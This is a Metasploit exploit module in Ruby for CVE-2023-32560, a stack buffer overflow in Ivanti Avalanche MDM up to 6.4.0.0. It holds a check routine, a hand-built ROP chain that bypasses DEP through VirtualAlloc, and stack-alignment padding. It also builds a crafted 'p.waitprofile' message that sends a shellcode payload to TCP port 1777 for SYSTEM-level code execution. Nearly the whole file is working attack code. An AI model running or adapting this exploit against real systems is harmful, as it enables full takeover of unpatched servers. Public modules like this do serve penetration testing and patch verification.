Ivanti Avalanche MDM Buffer Overflow

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Ivanti Avalanche MDM Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow condition in Ivanti Avalanche MDM versions before v6.4.1.
          An attacker can send a specially crafted message to the Wavelink Avalanche Manager,
          which could result in arbitrary code execution with the NT/AUTHORITY SYSTEM permissions.
          This vulnerability occurs during the processing of 3/5/8/100/101/102 item data types.
          The program tries to copy the item data using `qmemcopy` to a fixed size data buffer on stack.
          Upon successful exploitation the attacker gains full access to the target system.

          This vulnerability has been tested against Ivanti Avalanche MDM v6.4.0.0 on Windows 10.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ege BALCI egebalci[at]pm.me', # PoC & Msf Module
          'A researcher at Tenable' # Discovery
        ],
        'References' => [
          ['CVE', '2023-32560'],
          ['URL', 'https://www.tenable.com/security/research/tra-2023-27'],
          ['URL', 'https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1']
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Arch' => ARCH_X86,
        'Payload' => {
          'BadChars' => "\x3b"
        },
        'Targets' => [['Ivanti Avalanche <= v6.4.0.0', {}]],
        'Privileged' => true,
        'DisclosureDate' => '2023-08-14',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )

    register_options(
      [
        OptPort.new('RPORT', [true, 'The remote Avalanche Manager port', 1777])
      ]
    )
  end

  def check
    begin
      connect
    rescue StandardError
      print_error('Could not connect to target!')
      return Exploit::CheckCode::Safe
    end
    res = sock.get_once

    if res =~ /p\.guid/
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    expected_payload_size = 622

    # This is a custom ROP chain for bypassing DEP via VirtualAlloc
    rop_chain = [0x00544498].pack('V') # pop edx ; mov eax, 0x00000022 ; ret ;
    rop_chain += [0x00001000].pack('V')  # flAllocationType
    rop_chain += [0x00499ac0].pack('V')  # pop eax ; ret ;
    rop_chain += [0x0056a208].pack('V')  # VirtualAlloc IAT entry
    rop_chain += [0x00566650].pack('V')  # pop ecx ; ret ;
    rop_chain += [0x00000040].pack('V')  # flProtect
    rop_chain += [0x0054b079].pack('V')  # pop ebx ; ret ;
    rop_chain += [0x00000320].pack('V')  # dwSize
    rop_chain += [0x00402323].pack('V')  # pop ebp; ret
    rop_chain += [0x0055642a].pack('V')  # pop eax; ret
    rop_chain += [0x0052ad90].pack('V')  # pop esi; ret;
    rop_chain += [0x0042792f].pack('V')  # jmp [eax]
    rop_chain += [0x00521907].pack('V')  # pop edi ; ret ;
    rop_chain += [0x00568968].pack('V')  # ret ;
    rop_chain += [0x004995ab].pack('V')  # pushad ; ret ;
    rop_chain += [0x00499c20].pack('V')  # push esp ; ret

    # Because of the compiler optimized `qmemcpy`
    # we are not able to directly return to out smashed stack.
    # This buffer re-arranges the entire stack for escaping
    # the longass function without crashing.
    buf = Rex::Text.rand_text_alpha(136)
    buf += [0].pack('V')             # set empty register
    buf += [0].pack('V')             # set empty register
    buf += [0].pack('V')             # stack alignment buffer
    buf += [0].pack('V')             # stack alignment buffer
    buf += [0x00511a80].pack('V')    # ESP -> $(rop: "add esp, 0x10 ; ret ;")
    buf += [0x00583900].pack('V')    # .data section scratch space
    buf += [0x00583900].pack('V')    # .data section scratch space
    buf += [0x00585858].pack('V')    # .data section scratch space
    buf += [0x00585857].pack('V')    # .data section scratch space

    # ==================
    name1 = 'h.mid'
    value1 = "\x30"

    name2 = 'h.cmd'
    value2 = "\x31\x39"

    name3 = 'p.waitprofile'
    value3 = (buf + rop_chain + make_nops(expected_payload_size - payload.encoded.length) + payload.encoded)

    item1 = [2].pack('N')
    item1 += [name1.length].pack('N')
    item1 += [value1.length].pack('N')
    item1 += name1 + value1

    item2 = [2].pack('N')
    item2 += [name2.length].pack('N')
    item2 += [value2.length].pack('N')
    item2 += name2 + value2

    item3 = [101].pack('N')
    item3 += [name3.length].pack('N')
    item3 += [value3.length].pack('N')
    item3 += name3 + value3

    hp = item1 + item2 + item3
    if hp.length % 16 != 0 # Add padding if not power of 16
      hp += ("\x00" * (16 - (hp.length % 16)))
    end

    preamble = [hp.length + 16].pack('N')
    preamble += [item1.length + item2.length].pack('N')
    preamble += [(hp.length + 16) - 0x3b].pack('N')
    preamble += [0].pack('N')

    packet = preamble + hp

    print_status('Connecting to target...')
    connect
    res = sock.get_once
    fail_with(Failure::UnexpectedReply, 'Could not connect to MDM service - no response') if res.nil?

    print_status('Sending payload...')
    sock.put(packet)
    disconnect
  end
end